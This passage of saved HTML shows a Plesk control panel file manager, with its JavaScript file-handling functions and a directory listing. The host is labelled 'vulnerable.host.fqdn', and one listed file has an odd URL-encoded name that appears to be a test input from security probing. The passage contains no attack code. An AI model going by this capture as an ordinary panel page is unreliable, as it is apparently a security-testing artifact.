               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/"
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value="touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="copy_move";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/"
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/"
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   


<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-create-dir" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_dir_oC();return false;" style=""><BUTTON name="bname_create_dir" id="buttonid-create-dir" type="button" onClick="Event.stop(event);new_dir_oC();return false;">Add New Directory</BUTTON><SPAN id="spanid-create-dir">Add New Directory</SPAN></DIV>
           <DIV class="commonButton" id="bid-create-file" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new file.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_file_oC();return false;" style=""><BUTTON name="bname_create_file" id="buttonid-create-file" type="button" onClick="Event.stop(event);new_file_oC();return false;">Add New File</BUTTON><SPAN id="spanid-create-file">Add New File</SPAN></DIV>
       </div>
       
   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Files</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       
       <script>
           function a(event) { tooltip.set(event, [{"type":"string","string":"Edit the file."}]); }
           function b(event) { tooltip.set(event, [{"type":"string","string":"View the file."}]); }
           function c(event) { tooltip.set(event, [{"type":"string","string":"i_filemanager__chdir"}]); }
           function d(event) { tooltip.set(event, [{"type":"string","string":"Change access rights to the file or directory."}]); }
           function e(event) { tooltip.set(event, [{"type":"string","string":"Change the file or directory name."}]); }
           function f(event, type) {
               switch (type) {
                   case "pdir":
                       tooltip.set(event, [{"type":"string","string":"Go to the directory one level up."}]);
                       break;
                   case "dir":
                       tooltip.set(event, [{"type":"string","string":"Go inside the directory."}]);
                       break;
                   case "text":
                       tooltip.set(event, [{"type":"string","string":"View the text file contents."}]);
                       break;
                   case "image":
                       tooltip.set(event, [{"type":"string","string":"View the image."}]);
                       break;
                   case "audio":
                       tooltip.set(event, [{"type":"string","string":"Audio file."}]);
                       break;
                   case "security":
                       tooltip.set(event, [{"type":"string","string":"Apache security file."}]);
                       break;
                   case "webscript":
                       tooltip.set(event, [{"type":"string","string":"Webscript page file."}]);
                       break;
                   case "wappage":
                       tooltip.set(event, [{"type":"string","string":"WAP page file."}]);
                       break;
                   case "webpage":
                       tooltip.set(event, [{"type":"string","string":"Web page file."}]);
                       break;
                   case "compressed":
                       tooltip.set(event, [{"type":"string","string":"Compressed file."}]);
                       break;
                   case "unknown_text":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (text data)."}]);
                       break;
                   case "unknown_binary":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (binary data)."}]);
                       break;
               }
           }
           function g(event) { tooltip.set(event, [{"type":"string","string":"Edit the file in a visual editor."}]); }
           function h(event) { tooltip.set(event, [{"type":"string","string":"Editing the file in a visual editor requires Internet Explorer version 5.5 or later."}]); }
           function i(event) { tooltip.set(event, [{"type":"string","string":"Open the file in a browser."}]); }
           function download_hint(event) { tooltip.set(event, [{"type":"string","string":"Download the file."}]); }
           function z() { tooltip.hide(); }

           function bin() { return confirm("This file may be a binary file. Do you want to open it?"); }
       </script>
       <div id="FileListSearch" class="actions-box show"><table width="100%" cellspacing="0" class="buttons"><tr><td class="main"><div><DIV class="commonButton" id="bid-remove-selected" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Delete the selected files or directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);remove_oC();return false;" style=""><BUTTON name="bname_remove_selected" id="buttonid-remove-selected" type="button" onClick="Event.stop(event);remove_oC();return false;">Remove</BUTTON><SPAN id="spanid-remove-selected">Remove</SPAN></DIV><DIV class="commonButton" id="bid-touch" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to change the timestamp.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);touch_oC();return false;" style=""><BUTTON name="bname_touch" id="buttonid-touch" type="button" onClick="Event.stop(event);touch_oC();return false;">Change Timestamp</BUTTON><SPAN id="spanid-touch">Change Timestamp</SPAN></DIV><DIV class="commonButton" id="bid-copy-move" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to copy or move to another directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);copy_move_oC();return false;" style=""><BUTTON name="bname_copy_move" id="buttonid-copy-move" type="button" onClick="Event.stop(event);copy_move_oC();return false;">Copy/Move</BUTTON><SPAN id="spanid-copy-move">Copy/Move</SPAN></DIV><DIV class="commonButton" id="bid-count-size" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Calculate the total size of selected files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);count_size_oC();return false;" style=""><BUTTON name="bname_count_size" id="buttonid-count-size" type="button" onClick="Event.stop(event);count_size_oC();return false;">Calculate Size</BUTTON><SPAN id="spanid-count-size">Calculate Size</SPAN></DIV><DIV class="commonButton" id="bid-extract-archive" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Extract files from the selected archives into the current directory. Note that the file names may be displayed improperly after the extraction if they contain national characters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);extract_oC();return false;" style=""><BUTTON name="bname_extract_archive" id="buttonid-extract-archive" type="button" onClick="Event.stop(event);extract_oC();return false;">Extract Files</BUTTON><SPAN id="spanid-extract-archive">Extract Files</SPAN></DIV></div></td><td class="misc"><div id="FileListSearchControl" class="show"><DIV class="commonButton" id="bid-search-show" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to show search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchShow();;return false;" style=""><BUTTON name="bname_search_show" id="buttonid-search-show" type="button" onClick="Event.stop(event);FileListSearchShow();;return false;">Show Search</BUTTON><SPAN id="spanid-search-show">Show Search</SPAN></DIV><DIV class="commonButton" id="bid-search-hide" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchHide();;return false;" style=""><BUTTON name="bname_search_hide" id="buttonid-search-hide" type="button" onClick="Event.stop(event);FileListSearchHide();;return false;">Hide Search</BUTTON><SPAN id="spanid-search-hide">Hide Search</SPAN></DIV></div></td></tr></table><table width="100%" cellspacing="0" class="searchArea buttons"><tr><td class="main"><div><TABLE cellspacing="0" class="searchSimple"><TR><TD><input type="text" name="filter" id="searchInput" value="" size="20" maxlength="245"></TD><TD><DIV class="commonButton" id="bid-search" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter a search pattern and click to find files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;" style=""><BUTTON name="bname_search" id="buttonid-search" type="submit" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;">Search</BUTTON><SPAN id="spanid-search">Search</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-show-all" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Show all files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;" style=""><BUTTON name="bname_show_all" id="buttonid-show-all" type="button" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;">Reset Search</BUTTON><SPAN id="spanid-show-all">Reset Search</SPAN></DIV></TD></TR></TABLE></div></td></tr></table></div><div class="paging pagingTop"><input type="hidden" name="page" value ="0"><input type="hidden" name="page_size" value ="25"><table width="100%"><tr><td>1-25 <A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items of 44 total</td><td align="center">Pages:&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">First</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">&lt;&lt;</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">1</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">2</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">&gt;&gt;</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">Last</a></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><input type="hidden" name="sort" value="name"><table width="100%" cellspacing="0" class="list"><TR><th width="0" class="select"><input type="checkbox" class="checkbox" name="FileListSelectAll" value="true" onClick="FileListSelect()"></th><th class="icon"><A href="#" onClick="FileListSort(&#039;type&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by type.&quot;&#125;]);" onMouseOut="tooltip.hide();">T</a></th><th width="65%" class="sort"><A href="#" onClick="FileListSort(&#039;name_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by name.&quot;&#125;]);" onMouseOut="tooltip.hide();">Name</a><img src="/skins/default/plesk/icons/arrow_up.gif"></th><th width="15%" class="number"><A href="#" onClick="FileListSort(&#039;size&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by size.&quot;&#125;]);" onMouseOut="tooltip.hide();">Size</a></th><th width="20%" class="number"><A href="#" onClick="FileListSort(&#039;ch_date&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by modification date.&quot;&#125;]);" onMouseOut="tooltip.hide();">Modification date</a></th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th></TR><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td>&nbsp;</td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();" onMouseOver="f(event, &#039;pdir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_pdir.gif" width="16" height="16" alt="file_pdir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();">..</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 03:11 PM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_App_Data" value="App_Data" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();">App_Data</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/App_Data" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=App_Data" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2FApp_Data" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_css" value="css" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();">css</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/css" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=css" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fcss" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_img" value="img" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();">img</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/img" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=img" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fimg" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_picture_library" value="picture_library" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();">picture_library</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/picture_library" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=picture_library" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fpicture_library" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_test" value="test" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Ftest%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Ftest%2F" onClick=";lon();">test</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/test" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=test" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Ftest" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%200fd28a9909b" value="%20a%3db%200fd28a9909b" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%25200fd28a9909b" onClick="return bin();;lon();">%20a%3db%200fd28a9909b</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%200fd28a9909b" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A 